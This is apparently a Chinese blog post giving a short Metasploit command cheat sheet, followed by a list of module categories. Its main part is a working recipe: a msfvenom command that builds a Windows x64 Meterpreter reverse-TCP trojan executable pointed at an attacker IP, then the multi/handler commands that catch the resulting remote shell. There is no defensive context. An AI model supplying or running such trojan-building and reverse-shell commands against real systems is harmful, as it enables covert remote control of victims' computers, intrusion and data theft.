metasploit 命令集

  • 创建exe木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.95 LPORT=4444 -f exe -o zhzy.exe

-p   指定PAYLOAD攻击荷载

-f    生成文件格式

-o   生成文件名

LHOST  要反弹的IP地址

LPORT  反弹接收端口

  • 建立链接

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.95
LHOST => 192.168.43.95
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

模块分类

  • 辅助模块(Aux)
  • 渗透攻击模块(Exploits)
    • 主动渗透攻击
    • 被动渗透攻击
  • 后渗透攻击模块(Post)
  • 攻击载荷模块(Payloads)
    • 独立(Singles)
    • 传输器(Stager)
    • 传输体(Stage)
  • 空指令模块(Nops)
  • 编码器模块(Encoders)

 

Leave a comment

电子邮件地址不会被公开。 必填项已用*标注